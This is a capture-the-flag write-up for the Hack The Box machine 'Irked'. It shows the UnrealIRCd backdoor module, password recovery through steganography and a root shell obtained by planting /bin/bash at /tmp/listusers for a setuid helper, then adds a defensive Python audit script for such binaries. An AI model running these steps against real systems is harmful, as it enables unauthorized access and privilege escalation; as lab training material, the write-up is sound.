HTB: Irked

As usual, we will start off with an nmap scan.

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
34271/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd

Looks like IRC is running on a couple of ports alongside httpd. Taking into account the name of the box, it's probably safe to assume IRC is the way in, but first let's look at the website.

Hmm, let's pull down that jpg for later.

A quick Google of UnrealIRCd returns a backdoor in the 3.2.8.1 release (CVE-2010-2075), and there is a Metasploit module for it. Let's set it up against port 8067 and see what we get.

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  10.10.10.117     yes       The target address
   RPORT  8067             yes       The target port (TCP)

It works, and we get dropped into a shell as the user ircd.

whoami
ircd

Looking through the home directories, we find a couple of interesting files in another user's Documents directory.

/home/djmardov/Documents
ls -lah
total 16K
drwxr-xr-x  2 djmardov djmardov 4.0K May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4.0K Nov 23 10:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

Catting out the .backup file gives us a password and a bit of a hint.

Super elite steg backup pw
UP********************ss

Now we have a password and a hint pointing to stego. Let's look at the jpg we downloaded earlier with steghide.

steghide extract -sf irked.jpg

This gives us another file, pass.txt.

Ka************HG

Using that password to SSH in as the user who owned the file, we now have access to user.txt and a clean shell.

cat user.txt
4a****************************8e

After a bit of enumeration, listing the SUID root binaries turns up an executable with an interesting name.

find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

Running that gives us one more hint. It looks like it's shelling out to another file, /tmp/listusers, which does not exist yet.

/usr/bin/viewuser
(unknown) :0           2018-11-22 12:34 (:0)
sh: 1: /tmp/listusers: not found
This application is being devleoped to set and test user permissions
It is still being actively developed

Since /tmp is world-writable and viewuser runs as root, creating a file containing /bin/bash at that location and running it again gives us a root shell and the root flag.

echo "/bin/bash" > /tmp/listusers
chmod +x /tmp/listusers
/usr/bin/viewuser
(unknown) :0           2018-11-22 12:34 (:0)
whoami
root
cat /root/root.txt
8d****************************f3
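The root cause here is a setuid-root binary that executes a hard-coded path under a directory any local user can write to. As an added example (not code from the original writeup), the script below audits a host for that pattern: it walks the usual binary trees, picks out setuid/setgid files, and flags any whose string table contains a path under /tmp, /var/tmp or /dev/shm. The directory list, the sample bytes and the walk roots are my own assumptions, and the sample string table is constructed to mimic a helper like viewuser.

```python
"""
Audit setuid/setgid binaries for embedded references to world-writable
directories (the viewuser pattern: a root SUID helper running /tmp/listusers).

Added example, not from the original writeup. WRITABLE_DIRS, the walk roots
and the SAMPLE bytes are assumptions/constructed data for illustration.
"""
import os
import re
import stat
from typing import Dict, Iterable, Iterator, List

# Directories that are writable by every local user on a typical Linux box.
# A privileged binary that references a path under one of these is suspect.
WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

# Absolute paths under WRITABLE_DIRS as they appear in a binary's string
# table: printable ASCII path components, ending at NUL or a non-path byte.
_PATH_RE = re.compile(
    rb"(?:" + b"|".join(re.escape(d.encode()) for d in WRITABLE_DIRS)
    + rb")(?:/[A-Za-z0-9._-]+)+"
)


def find_writable_path_refs(data: bytes) -> List[str]:
    """Return the distinct world-writable paths embedded in raw binary bytes."""
    seen: List[str] = []
    for match in _PATH_RE.finditer(data):
        path = match.group(0).decode("ascii", "replace")
        if path not in seen:
            seen.append(path)
    return seen


def is_setuid_or_setgid(path: str) -> bool:
    """True if path is a regular file with the setuid or setgid bit set."""
    try:
        st = os.lstat(path)  # lstat: do not follow symlinks
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))


def iter_privileged_binaries(roots: Iterable[str] = ("/usr", "/bin", "/sbin")) -> Iterator[str]:
    """Walk the given trees (without following symlinks) and yield setuid/setgid files."""
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                candidate = os.path.join(dirpath, name)
                if is_setuid_or_setgid(candidate):
                    yield candidate


def audit(paths: Iterable[str]) -> Dict[str, List[str]]:
    """Map each readable privileged binary to the writable-directory paths it references."""
    findings: Dict[str, List[str]] = {}
    for path in paths:
        try:
            with open(path, "rb") as fh:
                refs = find_writable_path_refs(fh.read())
        except OSError:
            continue  # unreadable or vanished; skip rather than abort the audit
        if refs:
            findings[path] = refs
    return findings


if __name__ == "__main__":
    # Constructed stand-in for the string table of a helper like viewuser.
    SAMPLE = b"\x7fELF...who\x00sh\x00-c\x00/tmp/listusers\x00/usr/bin/viewuser\x00"
    print("sample refs:", find_writable_path_refs(SAMPLE))  # ['/tmp/listusers']
    # Live audit of the local host (requires read access to the binaries).
    for binary, refs in audit(iter_privileged_binaries()).items():
        print(f"{binary}: {', '.join(refs)}")
```

A hit from this script is a lead, not a verdict: a binary may reference /tmp legitimately (creating its own files there). The point is that a setuid program must never execute or trust a file under a user-writable directory; the fix for a helper like viewuser is to keep its callee in a root-owned directory and invoke it by that absolute path.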

NOTE: In fact, we do not need the djmardov user for this at all. The privesc can be done directly from the ircd user, and the user flag can then be read as root. This is, however, probably not the intended path.

This was a pretty direct machine; however, the use of stego to hide a password is a little unrealistic. A few of the newer machines added to the active lineup have been more real-world, DevOops for example, which makes them a bit more fun.
